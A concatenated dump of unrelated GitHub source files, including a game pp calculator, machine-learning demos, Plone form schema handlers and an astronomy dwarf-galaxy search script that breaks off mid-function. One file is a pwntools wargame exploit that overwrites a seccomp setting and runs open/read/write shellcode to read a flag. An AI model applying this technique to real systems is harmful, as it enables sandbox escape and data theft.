__future__ import annotations\n\nimport json\nfrom os import path\nfrom typing import Any\n\nfrom rosu_pp_py import Calculator, Beatmap\n\nfrom config import osu_folder_path\nfrom gamemode import GameMode\nfrom mods import Mods\n\n\ndef to_dic(obj):\n dic = {}\n for field_key in dir(obj):\n field_value = getattr(obj, field_key)\n if not field_key.startswith(\"__\") and not callable(field_value) \\\n and not field_key.startswith(\"_\") and field_key != \"difficulty\":\n dic[field_key] = field_value\n return dic\n\n\nclass SkipNoneEncoder(json.JSONEncoder):\n def default(self, obj):\n if isinstance(obj, dict):\n # 过滤掉值为 None 的字段\n return {k: v for k, v in obj.items() if v is not None}\n return json.JSONEncoder.default(self, obj)\n\n\ndef json_dump(obj):\n return json.dumps(to_dic(obj))\n\n\ndef calculate(beatmap_id: int, mods: int, mode: int, acc: float, ngeki: int, nkatu: int, n300: int,\n n100: int, n50: int, nmiss: int, combo: int):\n try:\n mode_vn = GameMode(mode).as_vanilla\n if mods & Mods.SCOREV2:\n mods &= ~Mods.SCOREV2\n if mods & Mods.NOFAIL:\n mods &= ~Mods.NOFAIL\n beatmap = Beatmap(path=path.join(osu_folder_path, str(beatmap_id) + \".osu\"))\n calculator = Calculator(mode=mode_vn, mods=mods, acc=acc, n_geki=ngeki, n_katu=nkatu,\n n300=n300, n100=n100,\n n50=n50,\n n_misses=nmiss)\n calculator.set_combo(combo)\n return do_calculate(calculator, beatmap, mode_vn, mods)\n except:\n return None, None, 0.0, None, None\n\n\ndef calculate_prepend(beatmap_id: int, mods: int, acc: float, mode_vn=0):\n beatmap = Beatmap(path=path.join(osu_folder_path, str(beatmap_id) + \".osu\"))\n calculator = Calculator(mode=mode_vn, mods=mods, acc=acc)\n return do_calculate(calculator, beatmap, mode_vn, mods)\n\n\ndef do_calculate(calculator: Calculator, beatmap: Beatmap, mode_vn: int, mods):\n beatmap_attr: Any = calculator.map_attributes(beatmap)\n difficulty_attr: Any = calculator.difficulty(beatmap)\n performance_attr: Any = calculator.performance(beatmap)\n strains: Any = calculator.strains(beatmap)\n performance_point = performance_attr.pp if beatmap_attr.mode == mode_vn else 0.0\n performance_point = performance_point if performance_point <= 8192 else 8192.0\n # We want to calc addition vanilla performance attr for rx scores in order to compare\n performance_vn = {}\n if mods & Mods.RELAX:\n mods &= ~Mods.RELAX\n calculator.set_mods(mods)\n performance_vn = calculator.performance(beatmap)\n return json_dump(difficulty_attr), json_dump(performance_attr), performance_point, json_dump(strains), json_dump(performance_vn)\n","repo_name":"TrueRou/pparking-lot","sub_path":"performance.py","file_name":"performance.py","file_ext":"py","file_size_in_byte":2835,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"42"} +{"seq_id":"45472675622","text":"def melon_count(day_number, path):\n \"\"\" day #number abd path for deliveries - produce report.\n \"\"\"\n print(\"==>> Day\", day_number)\n\n delivery_log = open(path)\n for line in delivery_log:\n line = line.rstrip()\n words = line.split('|')\n\n melon = words[0]\n count = words[1]\n amount = words[2]\n # list unpack method: melon, count, amount = words\n # \n print(f\"Delivered {count} {melon}s for total of ${amount}\")\n\n delivery_log.close()\n\nmelon_count(1, \"um-deliveries-day-1.txt\")\nmelon_count(2, \"um-deliveries-day-2.txt\")\nmelon_count(3, \"um-deliveries-day-3.txt\")\n","repo_name":"SandyC1000/Hackbright1","sub_path":"homework/melon-delivery-report/produce_summary.py","file_name":"produce_summary.py","file_ext":"py","file_size_in_byte":625,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"42"} +{"seq_id":"29539867488","text":"import cv2\nimport numpy as np\nimport imutils\nfrom imutils.video import VideoStream\n'from adafruit_servokit import ServoKit'\ntry:\n import logging\n logging.getLogger(\"tensorflow\").setLevel(logging.CRITICAL)\nfinally:\n import tensorflow as tf\n import tflearn\n from tflearn.layers.conv import conv_2d, max_pool_2d\n from tflearn.layers.core import input_data, dropout, fully_connected\n from tflearn.layers.estimator import regression\n\ntf.reset_default_graph()\nconvnet = input_data(shape=[None, 89, 100, 1], name='input')\nconvnet = conv_2d(convnet, 32, 2, activation='relu')\nconvnet = max_pool_2d(convnet, 2)\nconvnet = conv_2d(convnet, 64, 2, activation='relu')\nconvnet = max_pool_2d(convnet, 2)\nconvnet = conv_2d(convnet, 128, 2, activation='relu')\nconvnet = max_pool_2d(convnet, 2)\nconvnet = conv_2d(convnet, 256, 2, activation='relu')\nconvnet = max_pool_2d(convnet, 2)\nconvnet = conv_2d(convnet, 256, 2, activation='relu')\nconvnet = max_pool_2d(convnet, 2)\nconvnet = conv_2d(convnet, 128, 2, activation='relu')\nconvnet = max_pool_2d(convnet, 2)\nconvnet = conv_2d(convnet, 64, 2, activation='relu')\nconvnet = max_pool_2d(convnet, 2)\nconvnet = fully_connected(convnet, 1000, activation='relu')\nconvnet = dropout(convnet, 0.75)\nconvnet = fully_connected(convnet, 3, activation='softmax')\nconvnet = regression(\n convnet, optimizer='adam', learning_rate=0.001,\n loss='categorical_crossentropy', name='regression')\n\nmodel = tflearn.DNN(convnet, tensorboard_verbose=0)\nmodel.load(\"TrainedModel/GestureRecogModel.tfl\")\n\nclassName = \"None\"\nbg = None\npredictedClass, confidence = None, 0\nnum_frames = 0\ntop, right, bottom, left = 10, 350, 225, 590\n\nvs = VideoStream(src=0).start()\n# vs = VideoStream(usePiCamera=True).start()\ncv2.waitKey(1000)\n\n'kit = ServoKit(channels=16)'\nchannel = 0\nblock = 0\n'kit.servo[channel].angle = 0'\n\nwhile True:\n '''if predictedClass == 1 and block == 0:\n kit.servo[channel].angle = 0\n block = 1\n elif predictedClass == 2 and block == 1:\n kit.servo[channel].angle = 120\n block = 0'''\n\n frame = vs.read()\n frame = imutils.resize(frame, width=700)\n frame = cv2.flip(frame, 1)\n roi = frame[top:bottom, right:left]\n gray = cv2.cvtColor(roi, cv2.COLOR_BGR2GRAY)\n gray = cv2.GaussianBlur(gray, (7, 7), 0)\n\n if num_frames < 30:\n if bg is None:\n bg = gray.astype(\"float\")\n\n cv2.accumulateWeighted(gray, bg, 0.5)\n num_frames += 1\n else:\n diff = cv2.absdiff(bg.astype(\"uint8\"), gray)\n thresholded = cv2.threshold(diff, 25, 255, cv2.THRESH_BINARY)[1]\n (cnts, _) = cv2.findContours(thresholded, cv2.RETR_EXTERNAL, cv2.CHAIN_APPROX_SIMPLE)\n predictedClass, confidence = None, 0\n if len(cnts) != 0:\n segmented = max(cnts, key=cv2.contourArea)\n\n cv2.drawContours(frame, [segmented + (right, top)], -1, (0, 100, 250))\n wsize = 100\n hsize = int(thresholded.shape[0] * (wsize / float(thresholded.shape[1])))\n thresholded_ = cv2.resize(thresholded, (wsize, hsize), interpolation=cv2.INTER_AREA)\n prediction = model.predict([thresholded_.reshape(89, 100, 1)])\n\n predictedClass, confidence = np.argmax(prediction), (np.amax(prediction) / (prediction[0][0] + prediction[0][1] + prediction[0][2]))\n # cv2.imshow(\"Thesholded\", thresholded)\n\n if confidence < 0.9:\n className = \"None\"\n else:\n if predictedClass == 1:\n className = \"Open hand\"\n elif predictedClass == 2:\n className = \"Closed hand\"\n\n cv2.putText(\n frame, f\"Pedicted Class : {className}\",\n (30, 455), cv2.FONT_HERSHEY_SIMPLEX, 1, (0, 0, 255), 2)\n\n cv2.putText(\n frame, f\"Confidence : {round(confidence * 100, 2)} %\",\n (30, 500), cv2.FONT_HERSHEY_SIMPLEX, 1, (0, 0, 255), 2)\n\n cv2.putText(\n frame, 'wait' if num_frames < 30 else 'start',\n (10, 30), cv2.FONT_HERSHEY_SIMPLEX, 1,\n (0, 0, 255) if num_frames < 30 else (0, 255, 0), 2)\n\n cv2.rectangle(frame, (left, top), (right, bottom), (255, 0, 0), 2)\n\n cv2.imshow(\"PiCamera\", frame)\n if cv2.waitKey(100) == 27:\n break\n\nvs.stop()\ncv2.destroyAllWindows()\n","repo_name":"ovvladimir/Robot","sub_path":"hand_control/detect.py","file_name":"detect.py","file_ext":"py","file_size_in_byte":4216,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"42"} +{"seq_id":"7806090499","text":"#!/usr/bin/env python3\n# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Wed Sep 2 13:19:23 2020\n@author: tom verguts\nHebbian learning by cost minimization\nlook at the train_x and train_y patterns; can you predict what W will look like after training?\n\"\"\"\nimport tensorflow as tf\nimport numpy as np\n\nnp.set_printoptions(precision = 2)\n# initialize variables\ntrain_x = np.array([[1, 1, 0],\n\t\t\t\t [0, 1, 1]])\ntrain_t = np.array([[1, 0],\n\t\t\t\t\t[0, 1]]) # t for target\nepochs = 10\nlearning_rate = 0.05\n\n# define TensorFlow components\nX = tf.Variable(initial_value = np.random.randn(1, train_x.shape[1]).astype(np.float32), name = \"input\")\nT = tf.Variable(initial_value = np.random.randn(1, train_t.shape[1]).astype(np.float32), name = \"output\")\nW = tf.Variable(initial_value = (np.random.randn(train_x.shape[1], train_t.shape[1])/100).astype(np.float32), name = \"weights\")\n\ndef cost():\n \"\"\" this cost function (eq (3.1) in MCP book) will be optimized\"\"\"\n return tf.matmul(-tf.matmul(X, W), tf.transpose(T)) \n\nopt = tf.keras.optimizers.SGD(learning_rate = learning_rate) # SGD = stochastic gradient descent\n\nfor epoch in range(epochs):\n for (x, t) in zip(train_x, train_t):\n X.assign(x[np.newaxis,:])\n T.assign(t[np.newaxis,:])\n opt.minimize(cost, [W])\n if not epoch%10: # plot output only every 10 epochs\n w = W.numpy()\n print(w, '\\n')\n\t\t\t\n","repo_name":"CogComNeuroSci/modeling-master","sub_path":"code_by_chapter/Chapter_3/ch3_tf2_hebb.py","file_name":"ch3_tf2_hebb.py","file_ext":"py","file_size_in_byte":1388,"program_lang":"python","lang":"en","doc_type":"code","stars":19,"dataset":"github-code","pt":"42"} +{"seq_id":"31617227967","text":"import fiftyone as fo\nimport fiftyone.zoo as foz\n\n# First time running this script, uncomment the line below.\n# dataset = foz.load_zoo_dataset(\"coco-2017\", split=\"validation\")\n\nlabels_file = r\"/home/idlab185/fiftyone/coco-2017/raw/person_keypoints_val2017.json\"\ndataset_file = r\"/home/idlab185/fiftyone/coco-2017/validation\"\n\ndataset = fo.Dataset.from_dir(\n dataset_type = fo.types.COCODetectionDataset,\n label_types = [\"detections\", \"segmentations\", \"keypoints\"],\n dataset_dir = dataset_file,\n labels_path = labels_file)\n\nsession = fo.launch_app(dataset)\nsession.wait()","repo_name":"Victorlouisdg/cloth-keypoint-generation","sub_path":"launch_fiftyone.py","file_name":"launch_fiftyone.py","file_ext":"py","file_size_in_byte":582,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"42"} +{"seq_id":"10011091601","text":"# 1- https://leetcode.com/discuss/interview-question/374440/Twitter-or-OA-2019-or-Weird-Faculty\n\n\ndef weird_faculty(qs):\n\n qs = [-1 if i==0 else 1 for i in qs]\n print(qs)\n n = len(qs)\n my_friend = sum(qs)\n my_answers = 0\n\n for i in range(n):\n print(my_answers, my_friend)\n if my_answers > my_friend:\n return i\n my_answers += qs[i]\n my_friend -= qs[i]\n\n return n \n\n\nprint(weird_faculty([1,1,1,0 , 1]))\n\n","repo_name":"nargesam/CS-ML-Basics","sub_path":"leetcodes/Twitter/1.py","file_name":"1.py","file_ext":"py","file_size_in_byte":464,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"42"} +{"seq_id":"74992920446","text":"#!/usr/bin/python3\n\nfrom pwn import *\n\n#p = process(\"./seccomp\")\np = remote(\"host1.dreamhack.games\", 10683)\ne = ELF(\"./seccomp\")\ncontext.arch = 'amd64'\n\nsla = lambda t, s: p.sendlineafter(t, s)\n\ndef write(shellcode):\n sla(\"> \", str(1))\n sla(\": \", shellcode)\n\ndef excute():\n sla(\"> \", str(2))\n\ndef aaw(address, value):\n sla(\"> \", str(3))\n sla(\": \", str(address))\n sla(\": \", str(value))\n\n# create shellcode\nsc = asm(\"mov rdi, 0x67616c66\")\nsc += asm(\"push rdi\")\nsc += asm(\"mov rdi, rsp\")\nsc += asm(\"xor rsi, rsi\")\nsc += asm(\"mov rdx, 0xff\")\nsc += asm(\"mov rax, 0x2\")\nsc += asm(\"syscall\")\n#----------# open flag file\n\nsc += asm(\"mov rdi, rax\")\nsc += asm(\"mov rsi, {}\".format(hex(e.bss() + 0x28)))\nsc += asm(\"mov rdx, 0xff\")\nsc += asm(\"xor rax, rax\")\nsc += asm(\"syscall\")\n#----------# read content of flag file in bss\n\nsc += asm(\"mov rdi, 0x1\")\nsc += asm(\"mov rsi, {}\".format(hex(e.bss() + 0x28)))\nsc += asm(\"mov rdx, 0xff\")\nsc += asm(\"mov rax, 0x1\")\nsc += asm(\"syscall\")\n#----------# write flag\n\naaw(0x602090, 0x2)\nwrite(sc)\nexcute()\n\np.sendline(\"flag\")\n\np.interactive()\n","repo_name":"rheehot/Security-1","sub_path":"wargame/dreamhack/dreamhack_pwnable_seccomp.py","file_name":"dreamhack_pwnable_seccomp.py","file_ext":"py","file_size_in_byte":1085,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"42"} +{"seq_id":"40667272982","text":"from z3c.form.interfaces import IFieldWidget, IValidator\nfrom z3c.form.util import getSpecification\nfrom z3c.form.validator import WidgetValidatorDiscriminators\nfrom zope.component import provideAdapter\nfrom zope.interface import implements, Interface\nfrom zope.interface.interface import InterfaceClass\n\nfrom plone.supermodel.utils import ns\nfrom plone.supermodel.parser import IFieldMetadataHandler\n\nfrom plone.autoform.interfaces import OMITTED_KEY, WIDGETS_KEY, MODES_KEY, ORDER_KEY\nfrom plone.autoform.interfaces import READ_PERMISSIONS_KEY, WRITE_PERMISSIONS_KEY\n\nfrom plone.autoform.interfaces import FORM_NAMESPACE, FORM_PREFIX\nfrom plone.autoform.interfaces import SECURITY_NAMESPACE, SECURITY_PREFIX\n\nfrom plone.autoform.utils import resolveDottedName\n\nclass FormSchema(object):\n \"\"\"Support the form: namespace in model definitions.\n \"\"\"\n implements(IFieldMetadataHandler)\n \n namespace = FORM_NAMESPACE\n prefix = FORM_PREFIX\n \n def _add(self, schema, key, name, value, expected=None):\n if expected is not None:\n obj = resolveDottedName(value)\n if not expected.implementedBy(obj):\n raise ValueError(\"%s not implemented by %s\"\n % (expected.__identifier__, value))\n tagged_value = schema.queryTaggedValue(key, {})\n tagged_value[name] = value\n schema.setTaggedValue(key, tagged_value)\n \n def _add_order(self, schema, name, direction, relative_to):\n tagged_value = schema.queryTaggedValue(ORDER_KEY, [])\n tagged_value.append((name, direction, relative_to,))\n schema.setTaggedValue(ORDER_KEY, tagged_value)\n \n def _add_interface_values(self, schema, key, name, values):\n tagged_value = schema.queryTaggedValue(key, [])\n values = values.split(' ')\n for value in values:\n if ':' in value:\n (interface_dotted_name, value) = value.split(':')\n interface = resolveDottedName(interface_dotted_name)\n if not isinstance(interface, InterfaceClass):\n raise ValueError(\n \"%s not an Interface.\"% interface_dotted_name)\n else:\n interface = Interface\n tagged_value.append((interface, name, value))\n schema.setTaggedValue(key, tagged_value)\n \n def _add_validator(self, field, value):\n validator = resolveDottedName(value)\n if not IValidator.implementedBy(validator):\n raise ValueError(\n \"z3c.form.interfaces.IValidator not implemented by %s.\"\n % value)\n provideAdapter(validator,\n (None, None, None, getSpecification(field), None),\n IValidator,\n )\n\n def read(self, fieldNode, schema, field):\n name = field.__name__\n \n widget = fieldNode.get( ns('widget', self.namespace) )\n mode = fieldNode.get( ns('mode', self.namespace) )\n omitted = fieldNode.get( ns('omitted', self.namespace) )\n before = fieldNode.get( ns('before', self.namespace) )\n after = fieldNode.get( ns('after', self.namespace) )\n validator = fieldNode.get( ns('validator', self.namespace) )\n\n if widget:\n self._add(schema, WIDGETS_KEY, name, widget, IFieldWidget)\n if mode:\n self._add_interface_values(schema, MODES_KEY, name, mode)\n if omitted:\n self._add_interface_values(schema, OMITTED_KEY, name, omitted)\n if before:\n self._add_order(schema, name, 'before', before)\n if after:\n self._add_order(schema, name, 'after', after)\n if validator:\n self._add_validator(field, validator)\n\n def write(self, fieldNode, schema, field):\n name = field.__name__\n \n widget = schema.queryTaggedValue(WIDGETS_KEY, {}).get(name, None)\n mode = [(i,v) for i,n,v in schema.queryTaggedValue(MODES_KEY, []) if n == name]\n omitted = [(i,v) for i,n,v in schema.queryTaggedValue(OMITTED_KEY, []) if n == name]\n order = [(d,v) for n,d,v in schema.queryTaggedValue(ORDER_KEY, []) if n == name]\n \n if widget is not None:\n if not isinstance(widget, basestring):\n widget = \"%s.%s\" % (widget.__module__, widget.__name__)\n fieldNode.set(ns('widget', self.namespace), str(widget))\n \n mode_values = []\n for interface, value in mode:\n if interface is not Interface:\n value = \"%s:%s\" % (interface.__identifier__, value)\n mode_values.append(value)\n if mode_values:\n fieldNode.set(ns('mode', self.namespace), \" \".join(mode_values))\n \n omitted_values = []\n for interface, value in omitted:\n if interface is not Interface:\n value = \"%s:%s\" % (interface.__identifier__, value)\n omitted_values.append(value)\n if omitted_values:\n fieldNode.set(ns('omitted', self.namespace), \" \".join(omitted_values))\n\n for direction, relative_to in order:\n if direction == 'before':\n fieldNode.set(ns('before', self.namespace), relative_to)\n elif direction == 'after':\n fieldNode.set(ns('after', self.namespace), relative_to)\n\nclass SecuritySchema(object):\n \"\"\"Support the security: namespace in model definitions.\n \"\"\"\n implements(IFieldMetadataHandler)\n \n namespace = SECURITY_NAMESPACE\n prefix = SECURITY_PREFIX\n \n def read(self, fieldNode, schema, field):\n name = field.__name__\n \n read_permission = fieldNode.get(ns('read-permission', self.namespace))\n write_permission = fieldNode.get(ns('write-permission', self.namespace))\n \n read_permissions = schema.queryTaggedValue(READ_PERMISSIONS_KEY, {})\n write_permissions = schema.queryTaggedValue(WRITE_PERMISSIONS_KEY, {})\n \n if read_permission:\n read_permissions[name] = read_permission\n schema.setTaggedValue(READ_PERMISSIONS_KEY, read_permissions)\n \n if write_permission:\n write_permissions[name] = write_permission\n schema.setTaggedValue(WRITE_PERMISSIONS_KEY, write_permissions)\n\n def write(self, fieldNode, schema, field):\n name = field.__name__\n \n read_permission = schema.queryTaggedValue(READ_PERMISSIONS_KEY, {}).get(name, None)\n write_permission = schema.queryTaggedValue(WRITE_PERMISSIONS_KEY, {}).get(name, None)\n \n if read_permission:\n fieldNode.set(ns('read-permission', self.namespace), read_permission)\n if write_permission:\n fieldNode.set(ns('write-permission', self.namespace), write_permission)","repo_name":"pchanxxx/msc-buidout","sub_path":"msc/eggs/plone.autoform-1.0-py2.6.egg/plone/autoform/supermodel.py","file_name":"supermodel.py","file_ext":"py","file_size_in_byte":6806,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"42"} +{"seq_id":"32047684461","text":"#!/usr/bin/env python\n\n# 1) pull data from object table for 2x2 deg\n# star/galaxy separation, color cut\n# pull coverage information from coverage table\n\n\n\n# 2) color cut in g-r\n\n# 3) make density map\n\n# 4) correct for covering fraction, set missing data to average value\n\n# 5) use luminosity function to correct for depth\n# try to to calculate this empircally, density vs. depth\n# or query Besancon at that position and figure out luminosity function\n\n# 6) mexican hat filter\n\n# 7) run peak finder, store peaks\n# ra, dec, significance, density above the background, shape parameter\n\n# 8) loop over peaks, do narrow cone search (size depends on shape)\n# everything from catalog around select portion of sky\n\n# 9) visualization to look at CMD and possibly an image\n\n# 10) machine learning to weed out the contaminants, large galaxies, galaxy clusters, etc.\n\n# Python 2/3 compatibility\nfrom __future__ import print_function # to use print() as a function in Python 2\n\ntry:\n input = raw_input # use 'input' function in both Python 2 and 3\nexcept NameError:\n pass\n\n# std lib\nfrom getpass import getpass\n\n# 3rd party\nimport pandas as pd\nimport numpy as np\nimport pylab as plt\nimport matplotlib\nfrom astropy import utils, io, convolution, stats, wcs\nfrom astropy.visualization import make_lupton_rgb\nfrom astropy import units as u\nfrom astropy.stats import median_absolute_deviation as mad\nfrom astropy.table import Table\nfrom scipy.interpolate import interp1d\nfrom scipy import arange, array, exp\n#%matplotlib inline\nimport healpy as hp\nfrom photutils import find_peaks, data_properties\nimport logging\nimport socket\nimport os\nimport sys\nimport time\n\n# Data Lab\nfrom dl import authClient as ac, queryClient as qc, storeClient as sc, helpers\n\n#Simple Image Access (SIA) service\nfrom pyvo.dal import sia\nDEF_ACCESS_URL = \"http://datalab.noao.edu/sia\"\nsvc = sia.SIAService(DEF_ACCESS_URL)\n\n# Quiet the Astropy warnings\nimport warnings\nfrom astropy.utils.exceptions import AstropyWarning\nwarnings.simplefilter('ignore', category=AstropyWarning)\n\n\n# Extrapolation function\ndef extrap1d(interpolator):\n xs = interpolator.x\n ys = interpolator.y\n\n def pointwise(x):\n if x < xs[0]:\n return ys[0]+(x-xs[0])*(ys[1]-ys[0])/(xs[1]-xs[0])\n elif x > xs[-1]:\n return ys[-1]+(x-xs[-1])*(ys[-1]-ys[-2])/(xs[-1]-xs[-2])\n else:\n return interpolator(x)\n\n def ufunclike(xs):\n return array(map(pointwise, array(xs)))\n\n return ufunclike\n\n# A function to retrieve data from a point on the sky\ndef getData (ra,dec,radius=1.0,columns='*'):\n\n query_template = \\\n \"\"\"SELECT {0:s} FROM nsc_dr1.object\n WHERE q3c_radial_query(ra,dec,{1:f},{2:f},{3:f})\"\"\"\n\n query = query_template.format(columns,ra,dec,radius)\n print(query)\n \n try:\n result = qc.query(token,sql=query) # by default the result is a CSV formatted string\n except Exception as e:\n print(e.message)\n \n df = helpers.convert(result,'table') # pandas\n \n return df\n\n# A function to retrieve data from a point on the sky\ndef getDataCuts (ra,dec,radius=1.0,columns='ra,dec,gmag,rmag',colcutlo=None,colcuthi=None,classcut=None,fwhmcut=None,errcut=None):\n\n query_template = \\\n \"\"\"SELECT {0:s} FROM nsc_dr1.object\n WHERE q3c_radial_query(ra,dec,{1:f},{2:f},{3:f})\"\"\"\n # (gmag-rmag)>({4:f}) and (gmag-rmag)<{5:f} and class_star>{6:f} and\n # fwhm<{7:f} and gerr<{8:f} and rerr<{8:f}\n\n query = query_template.format(columns,ra,dec,radius,colcutlo,colcuthi,classcut,fwhmcut,errcut)\n if colcutlo is not None: query+=\" and (gmag-rmag)>(\"+\"{0:f}\".format(colcutlo)+\")\"\n if colcuthi is not None: query+=\" and (gmag-rmag)<\"+\"{0:f}\".format(colcuthi)\n if classcut is not None: query+=\" and class_star>\"+\"{0:f}\".format(classcut)\n if fwhmcut is not None: query+=\" and fwhm<\"+\"{0:f}\".format(fwhmcut)\n if errcut is not None: query+=\" and gerr<\"+\"{0:f}\".format(errcut)\n if errcut is not None: query+=\" and rerr<\"+\"{0:f}\".format(errcut)\n print(query)\n \n try:\n result = qc.query(token,sql=query) # by default the result is a CSV formatted string\n except Exception as e:\n print(e.message)\n \n df = helpers.convert(result,'table') # pandas\n \n return df\n\n# A function to retrieve data from a point on the sky\ndef getCovData (ra,dec,radius=1.0,columns='*'):\n\n query_template = \\\n \"\"\"SELECT {0:s} FROM nsc_dr1.coverage\n WHERE q3c_radial_query(ra,dec,{1:f},{2:f},{3:f})\"\"\"\n\n query = query_template.format(columns,ra,dec,radius)\n print(query)\n \n try:\n result = qc.query(token,sql=query) # by default the result is a CSV formatted string\n except Exception as e:\n print(e.message)\n \n df = helpers.convert(result,'pandas')\n \n return df\n\n# A Mexican-hat convolution filter\ndef dwarf_filter (ra,dec,fwhm_small=2.0,fwhm_big=20):\n\n # Based on Koposov et al. (2008).\n # Code by Ken Mighell and Mike Fitzpatrick.\n # Minor edits by Rorbert Nikutta.\n \n x, y = ra, dec\n\n # Information about declination (y) [degrees]\n ymean = (y.min() + y.max()) / 2.0\n ydiff_arcmin = (y.max() - y.min()) * 60.0 # convert from degrees to arcmin\n\n # Information about right ascension (x) [degrees in time]:\n xdiff = x.max() - x.min() # angular separation [degrees (time)] \n xmean = (x.min() + x.max())/2.0\n\n # convert from degrees in time to separation in angular degrees:\n xdiff_angular = (x.max() - x.min()) * np.cos(ymean*(np.pi/180.0))\n\n # convert from degress to arcmin\n xdiff_angular_arcmin = xdiff_angular * 60.0 \n\n # Get the number of one-arcmin pixels in the X and Y directions:\n nx = np.rint (xdiff_angular_arcmin).astype('int')\n ny = np.rint (ydiff_arcmin).astype('int')\n \n # Create a two-dimensional histogram of the raw counts:\n Counts, xedges, yedges = np.histogram2d (x, y, (nx,ny) )\n extent = [xedges[0], xedges[-1], yedges[0], yedges[-1]]\n raw_hist = np.rot90(Counts).copy() # hack around Pythonic weirdness\n\n # Make the small and big Gaussian kernels with a standard deviation\n # of the given FWHM in arcmin^2 pixels.\n kernel_small = convolution.Gaussian2DKernel(fwhm_small/2.35,factor=1)\n kernel_big = convolution.Gaussian2DKernel(fwhm_big/2.35,factor=1)\n\n # Compute the differential convolution kernels.\n conv_big = convolution.convolve (raw_hist, kernel_big)\n conv_small = convolution.convolve (raw_hist, kernel_small)\n conv_delta = conv_small - conv_big\n delta = conv_delta.copy()\n\n # Compute statistics and the floor\n mean = np.mean (delta, dtype='float64')\n sigma = np.std (delta, dtype='float64')\n sigmaRaw = np.std(raw_hist,dtype='float64')\n median = np.median (delta) # not used\n floor = mean \n\n # Clip to specified limits.\n clipped = delta.copy()\n clipped[ delta < floor ] = floor\n\n # Return the computed fields.\n return raw_hist, extent, delta, clipped, sigma\n\n# A little function to download the deepest stacked images\n# adapted from R. Nikutta\ndef download_deepest_image(ra,dec,fov=0.1,band='g'):\n imgTable = svc.search((ra,dec), (fov/np.cos(dec*np.pi/180), fov), verbosity=2).votable.to_table()\n print(\"The full image list contains\", len(imgTable), \"entries\")\n \n sel0 = imgTable['obs_bandpass'].astype(str)==band\n sel = sel0 & ((imgTable['proctype'].astype(str)=='Stacked') & (imgTable['prodtype'].astype(str)=='image')) # basic selection\n Table = imgTable[sel] # select\n if (len(Table)>0):\n row = Table[np.argmax(Table['exptime'].data.data.astype('float'))] # pick image with longest exposure time\n url = row['access_url'].decode() # get the download URL\n print ('downloading deepest image...')\n image = io.fits.getdata(utils.data.download_file(url,cache=True,show_progress=False,timeout=120))\n\n else:\n print ('No image available.')\n image=None\n \n return image\n\n# Multi panel image plotter\ndef plot_images(images,geo=None,panelsize=4,bands=list('gri'),cmap=matplotlib.cm.gray_r):\n n = len(images)\n if geo is None: geo = (n,1)\n \n fig = plt.figure(figsize=(geo[0]*panelsize,geo[1]*panelsize))\n for j,img in enumerate(images):\n ax = fig.add_subplot(geo[1],geo[0],j+1)\n if img is not None:\n print(img.min(),img.max())\n vmin = np.median(img)-2*np.std(img)\n vmax = np.median(img)+2*np.std(img)\n ax.imshow(img,origin='lower',interpolation='none',cmap=cmap,norm=matplotlib.colors.LogNorm(vmin=vmin, vmax=vmax))\n ax.set_title('%s band' % bands[j])\n ax.xaxis.set_visible(False)\n ax.yaxis.set_visible(False)\n\n# Create a WCS for a tangent plane projection in our region\ndef get_wcs(ra,dec,image,fov=1.,unit='deg',projection=(\"RA---TAN\",\"DEC--TAN\")):\n npix = image.shape[0]\n crpix = npix/2 + 1\n cdelt = fov/float(npix)\n w = wcs.WCS(naxis=2)\n w.wcs.cunit = (unit,unit)\n w.wcs.crpix = (crpix,crpix)\n w.wcs.cdelt = np.array((-cdelt,cdelt))\n w.wcs.ctype = projection\n w.wcs.crval = (ra,dec) #coords.ra.to(unit).value, coords.dec.to(unit).value)\n return w\n\ndef plotpanel(axid,x,y,title='',xlim=(-1,2),ylim=(25.2,14)):\n ax = fig.addxs_subplot(axid)\n ax.scatter(x,y,marker='.',s=10, alpha=0.8)\n ax.set_xlabel(x.name)\n ax.set_ylabel(y.name)\n ax.set_xlim(xlim)\n ax.set_ylim(ylim)\n ax.set_title(title)\n\n\nif __name__ == \"__main__\":\n\n hostname = socket.gethostname()\n host = hostname.split('.')[0]\n\n # Version\n verdir = \"v1\"\n if len(sys.argv) > 2:\n version = sys.argv[3]\n verdir = version if version.endswith('/') else version+\"/\"\n\n # on thing/hulk use\n if (host == \"thing\") | (host == \"hulk\"):\n dir = \"/dl1/users/dnidever/nsc/dwarfs/\"+verdir\n # on gp09 use\n if (host == \"gp09\") | (host == \"gp08\") | (host == \"gp07\") | (host == \"gp06\") | (host == \"gp05\"):\n dir = \"/net/dl1/users/dnidever/nsc/dwarfs/\"+verdir\n if (host == \"NideverMacBookPro\"):\n dir = \"/Users/nidever/datalab/nsc/dwarfs/\"+verdir\n \n t0 = time.time()\n\n print(sys.argv)\n\n # Not enough inputs\n n = len(sys.argv)\n if n < 2:\n print(\"Syntax - ns_dwarfs_hpix.py hpix radius version\")\n sys.exit()\n\n # Inputs\n hpix = np.int(sys.argv[1])\n radius = np.float(sys.argv[2])\n\n # Convert healpix to ra/dec\n nside = np.int(64)\n ra0, dec0 = hp.pix2ang(nside,hpix,lonlat=True)\n\n # Output name\n outbase = str(hpix)+'_'+str(radius)+'_'+str(version)\n outdir = dir+str(hpix/1000)+'/'+str(hpix)+'/'\n if not os.path.exists(outdir): # make output directory if necessary\n os.makedirs(outdir)\n outfile = outdir+outbase+'_peaks.fits'\n donefile = outdir+outbase+'.done'\n\n # Check if the \"done\" file already exists\n if os.path.exists(donefile):\n print('This healpix was already done')\n sys.exit()\n\n # Set up logging to screen and logfile\n #logFormatter = logging.Formatter(\"%(asctime)s [%(threadName)-12.12s] [%(levelname)-5.5s] %(message)s\")\n logFormatter = logging.Formatter(\"%(asctime)s [%(levelname)-5.5s] %(message)s\")\n rootLogger = logging.getLogger()\n\n #logfile = tmpdir+\"/\"+base+\".log\"\n logfile = outdir+outbase+\".log\"\n # Delete file if it exists\n if os.path.exists(logfile):\n os.remove(logfile)\n #fileHandler = logging.FileHandler(\"{0}/{1}.log\".format(logPath, fileName))\n fileHandler = logging.FileHandler(logfile)\n fileHandler.setFormatter(logFormatter)\n 